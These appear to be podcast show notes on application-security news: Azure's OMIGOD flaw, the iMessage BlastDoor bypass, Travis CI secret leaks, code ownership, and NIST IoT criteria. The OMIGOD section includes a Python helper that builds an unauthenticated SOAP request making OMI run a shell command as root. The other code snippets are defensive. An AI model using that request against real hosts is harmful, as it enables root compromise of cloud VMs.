OMIGOD, FORCEDENTRY, Code Ownership, Security as a Product, & IoT Device Criteria – ASW #166
This week in the AppSec News, Mike and John talk: RCE in Azure OMI, punching a hole in iMessage BlastDoor, Travis CI exposes sensitive environment variables, keeping code ownership accurate, deploying security as a product, IoT Device Criteria (aka nutrition labels), & more!
InfoSec World 2021 is proud to announce its keynote lineup for this year’s event! Hear from Robert Herjavec plus heads of security at the NFL, TikTok, U.S. Department of Homeland Security, Stanford University, and more… Plus, Security Weekly listeners save 20% on Digital Pass registration! Visit https://securityweekly.com/isw2021 to register now!
In an overabundance of caution, we have decided to flip this year’s SW Unlocked to a virtual format. The safety of our listeners and hosts is our number one priority. We will miss seeing you all in person, but we hope you can still join us at Security Weekly Unlocked Virtual! The event will now take place on Thursday, Dec 16 from 9am-6pm ET. You can still register for free at https://securityweekly.com/unlocked.
Here's a named vulnerability worthy of its name. Azure adds an embedded Open Management Infrastructure (OMI) agent to Linux VMs in order to enable them to work with Azure services like Automation, Automatic Update, and Configuration. (There are at least seven Azure services that rely on this; the article provides details.)
This OMI service requires an authorization header. So far so good. What the researchers discovered, and why "OMIGOD" is such a fitting name, is that the service fails open if you omit the header -- more specifically, the request gains root privileges. What's really unfortunate is that OMI is installed by Azure itself. In the modern "shared responsibility" models of cloud service providers, this is one of the starkest examples of the CSP increasing a customer's attack surface in a way that's likely a big surprise to many customers.
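To make the fail-open behavior concrete, here's a minimal sketch of the request shape reported for OMIGOD (CVE-2021-38647). OMI's remote management endpoint listens on port 5986 at `/wsman`; the flaw was that a WS-Man request with no Authorization header at all was treated as authenticated -- as root. The `build_omigod_probe` helper and the trimmed-down SOAP envelope below are illustrative assumptions for discussion, not a tested proof of concept (real PoCs carry a fuller WS-Addressing envelope).

```python
# Simplified SOAP body asking OMI's SCX_OperatingSystem provider to run a
# shell command. Real exploit payloads include additional WS-Man headers.
SOAP_TEMPLATE = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
  <s:Body>
    <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.microsoft.com/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
      <p:command>{command}</p:command>
      <p:timeout>0</p:timeout>
    </p:ExecuteShellCommand_INPUT>
  </s:Body>
</s:Envelope>"""

def build_omigod_probe(host: str, command: str) -> tuple[str, dict, str]:
    """Return (url, headers, body) for an unauthenticated OMI request.

    Note the deliberate absence of an Authorization header -- the
    vulnerable service treated its omission as a valid root request.
    """
    url = f"https://{host}:5986/wsman"
    headers = {"Content-Type": "application/soap+xml;charset=UTF-8"}
    body = SOAP_TEMPLATE.format(command=command)
    return url, headers, body
```

The point of the sketch: the "authentication" was entirely in the client's hands, which is why scanning for exposed 5986 listeners became the immediate triage step.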
An important part of this story is how information security (and appsec) can have significant consequences for those targeted by authoritarian regimes and governments with poor human rights records. It's a good reminder that not everyone's threat model is the same. A lot of security decisions weigh trade-offs of usability or how well a design addresses certain types of attacks.
Another important part of this story is how design choices can attempt to reduce the impact of exploits. This new vuln in iMessage worked even against the app's new architecture, BlastDoor, which attempts to create more isolation around notoriously vulnerable areas of code like parsers. After all, parsing images (and other content) represents a major attack surface of messaging apps. While it's disappointing that BlastDoor was still exploited in this manner, that doesn't mean the approach to refactoring iMessage wasn't a smart decision. It means that the appsec work needs to continue.
Check out the Project Zero description of BlastDoor at https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html
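The BlastDoor principle in miniature: run the fragile parser in a separate, short-lived process so a crash (or exploit) in the parser can't directly take down, or take over, the main app. The sketch below shows only the process-isolation part; real sandboxes like BlastDoor also drop privileges and restrict syscalls. The `MSG:` framing and the parser logic here are made-up stand-ins for any parser handling untrusted input.

```python
import subprocess
import sys

# Stand-in parser that runs as a child process. A real one would be an
# image or message decoder -- exactly the code that tends to have bugs.
PARSER_SNIPPET = r"""
import sys
data = sys.stdin.buffer.read()
if not data.startswith(b"MSG:"):
    sys.exit(1)  # malformed input: fail closed
sys.stdout.write(data[4:].decode("utf-8", errors="replace"))
"""

def isolated_parse(data: bytes, timeout: float = 5.0):
    """Parse untrusted bytes in a child process.

    Returns the parsed string, or None if the parser crashed, errored,
    or hung -- in every failure mode the main process keeps running.
    """
    try:
        result = subprocess.run(
            [sys.executable, "-c", PARSER_SNIPPET],
            input=data, capture_output=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return None  # hung parser: treat the input as hostile
    if result.returncode != 0:
        return None
    return result.stdout.decode("utf-8")
```

The design trade-off is the same one Apple made: you pay process-spawn overhead per message in exchange for containing the blast radius of a parser bug.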
Here's a twitter thread and Google doc with some very in-depth analysis on the Pegasus spyware:
On a similar theme to this week's article about an Azure vuln, here's a case where a CI/CD service provider exposed sensitive environment variables to untrusted builds. In other words, a malicious pull request made to a public repo could gain unauthorized access to secrets in those environment variables. It's a situation particularly challenging for open source projects, since they're intended to foster collaboration on public repos. But it's also a chance to talk about trusted vs. untrusted builds, patterns for managing secrets, and what the attack surface of your CI/CD system looks like. And it's not like CI/CD security in the supply chain hasn't been mentioned once or twice this year...
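One way to frame the trusted vs. untrusted build distinction is as a gate on secret injection: secrets should only reach builds of code your own team pushed, never builds triggered by a fork's pull request. The `Build` shape and secret names below are hypothetical; this is a sketch of the pattern, not any particular CI system's API.

```python
from dataclasses import dataclass

@dataclass
class Build:
    repo: str            # repo the build runs for, e.g. "org/app"
    source_repo: str     # repo the triggering code actually came from
    is_pull_request: bool

def secrets_for_build(build: Build, secrets: dict[str, str]) -> dict[str, str]:
    """Inject env-var secrets only into trusted (non-fork) builds."""
    from_fork = build.is_pull_request and build.source_repo != build.repo
    if from_fork:
        return {}  # untrusted build: still run it, but with no secrets
    return dict(secrets)
```

The hard part for open source projects is that the untrusted path is the common path, so anything a fork PR's build steps can read (env vars, cache, credentials files) has to be treated as public.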
Here's the security bulletin from Travis CI:
"Who owns this code for this app?" -- that's usually the second question after, "What apps do we have?" And just like saying, "have an app inventory", it's easier said than done. Here's one example of how a company approached the challenge through a standardized expectation and automation to help validate that expectation. It's a good start, but many orgs may see the chicken-and-egg problem of how to identify and populate ownership for orphaned, legacy, or end-of-life services (that never seem to reach an end-of-life and often end up supporting revenue streams -- despite being stale and unowned). Nevertheless, tracking code ownership is something to do early and do often in order to make it a DevOps habit and to be accurate. After all, when that bug bounty report about a critical RCE or gnarly injection comes in, you don't want to have to waste hours or days on figuring out who understands the code well enough to fix it safely and correctly.
Another theme this week seems to be what companies are doing to make fundamental improvements to security. This article from Netflix may be long, but it's worth the read. It reinforces the familiar tone of modern security engineering: build something in collaboration with dev teams. It uses the example of incorporating strong authentication into services and it also calls attention to using a product-based approach rather than a checklist or requirement-based one. This means that not only did the security engineering team focus on a high-risk problem, they communicated the value of their solution to their engineering peers while also taking the time to understand what would make their product successful.
This is the kind of article where we focus less on implementation specifics and more on the principle behind this choice. Don't worry so much about the Android part. Instead, think about the principle of resetting to secure defaults and taking the time to apply that to legacy choices. Put another way, think about the idea of decaying permissions over time to a point where they're fully revoked or close. It's an approach that can put more agency on users to be able to make informed decisions, and it can be a way to reflect permission grants that might be desired at one point in time, but not for all time. We've seen similar changes in the way iPhone has managed more granular or time-based permissions within its apps, such as accessing a single photo rather than everything in the Photos app, or allowing location access for a short period of time.
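The decaying-permissions idea can be sketched as a tiny lifecycle function: instead of a grant living forever, its state degrades with disuse until it's revoked and the app has to ask again. The thresholds (30 and 90 days) and state names below are made-up policy numbers for illustration, not anything from the Android implementation.

```python
from datetime import datetime, timedelta

def permission_state(last_used: datetime, now: datetime,
                     reconfirm_after: timedelta = timedelta(days=30),
                     revoke_after: timedelta = timedelta(days=90)) -> str:
    """Map time-since-last-use of a permission to a lifecycle state.

    active           -> grant still honored
    needs_reconfirm  -> prompt the user: "still want X to access Y?"
    revoked          -> grant removed; the app must request it again
    """
    idle = now - last_used
    if idle >= revoke_after:
        return "revoked"
    if idle >= reconfirm_after:
        return "needs_reconfirm"
    return "active"
```

The nice property is that a one-time grant (say, location for a single trip) converges on "revoked" with no user effort, while permissions the user actively exercises stay untouched.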
There's not much new in this article yet, but it is a good reminder of the aggressive timeline that NIST has set for IoT Device Criteria. NIST just recently hosted a workshop, which they'll be posting the videos for soon (we'll keep an eye out).
You can find a link to the draft IoT Device Criteria at https://www.nist.gov/itl/executive-order-improving-nations-cybersecurity/iot-device-criteria. Comments are due October 17, 2021. So for those of you with strong feelings on software updates, authentication, encrypted connections, and other product security issues that may appear in these criteria, you'll want to check it out.
Some additional info from NIST is at:
We're venturing to the edge of think piece territory again with this article. Even so, the very first pitfall is something appsec teams should be wary of when they're talking to their org's leadership just as much as when they're talking to devs: talking about security risk rather than business risk.
Just as we continuously talk about the importance of the dev experience in modern appsec tools and processes, the way appsec teams talk about and prioritize vulns matters just as much. It's another reason why the OWASP Top 10 remains a good reference to raise awareness about common security flaws -- and why it needs more context about your org's apps, their frameworks, their data, their workflows, and their business impact in order to be a rich conversation about why security is important. That's the difference between mistreating the Top 10 as a standard and using it as a departure point for a robust secure SDLC.